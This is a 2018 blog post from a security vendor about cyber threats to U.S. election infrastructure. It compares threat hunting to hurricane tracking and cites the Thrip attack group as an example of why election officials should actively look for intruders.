“The warning lights are blinking red again.” - Director of National Intelligence Dan Coats talking about the cyber security threats facing U.S. electoral infrastructure.
Several years ago, I had the opportunity to participate in a briefing at the National Hurricane Center (NHC) where I saw firsthand their processes for predicting, tracking, and communicating warnings about hurricanes. Truly impressive. When the NHC issues warnings, emergency managers use that information to raise defenses, deploy resources, and plan for imminent threats.
Unfortunately, security professionals tasked with defending our electoral system generally don’t have similar forewarning. It’s as if they are preparing for a hurricane without knowing its trajectory, speed, or strength. Director Coats’ public statements are akin to NHC predicting a dangerous hurricane season but then not tracking the individual storms.
The other related challenge is that information about cyber attacks is almost always highly classified. State and local election officials often don’t know about inbound threats and may be unaware that they are in the midst of an ongoing incident. In other words, they could be in the eye of a hurricane and not know it. This isn’t unique to elections however. There are important lessons to be learned from other critical infrastructure sectors.
Last month, we issued a report about a previously unknown attack group known as Thrip. Thrip is a sophisticated attacker and uses a technique we call “living off the land” – using operating system features or legitimate network administration tools to compromise victims’ networks. Simply put, they use good programs to do bad things. These types of attacks are difficult to detect, because malicious activity is disguised as normal system operations. When we discovered Thrip, they had already compromised satellite operators, telecommunications companies, and a defense contractor.
We identified this malicious activity using an advanced hunting tool we call Targeted Attack Analytics, which crawls through massive data sets looking for minute indicators of malicious activity. When we find something – like Thrip – we update our protections to stop it in the future. But attackers are always evolving, so, as was the case in Thrip, we often find them after their attack was already in process. In other words, we analyzed seemingly normal weather data – and found a previously invisible Category 5 storm that had the potential for massive damage.
The end result is that state and local election officials need to actively hunt the adversaries because a strictly defensive posture leaves them vulnerable. In short, they need to go and find the storm.
But sometimes we do see the storm coming. Last week the Minority of the Committee on House Administration released a report identifying 18 of the most vulnerable states to being hacked. This report focused on the need for paper ballots and redundant backup systems and audits, among other things. Essential elements for sure, but the adversaries also read the weather reports and are changing their tactics and targets in response. State and local election officials need to adapt as well.
One way for them to do this is by utilizing hunting techniques similar to those that found Thrip. As noted in a recent blog, election security is about more than just the ballot box. This means that the threat surface is much broader and gives the adversaries many more targets to attack. The end result is that state and local election officials need to actively hunt the adversaries because a strictly defensive posture leaves them vulnerable. In short, they need to go and find the storm.
We are confronting a persistent and creative adversary dedicated to undermining the legitimacy of the elections process itself. The recent indictments against twelve Russian intelligence officials for hacking the 2016 elections only reinforce this notion. We need to take Director Coats’ comments to heart because even if the lights look green they may in fact be flashing red.
Originally posted on 08/01/2018
We encourage you to share your thoughts on your favorite social platform.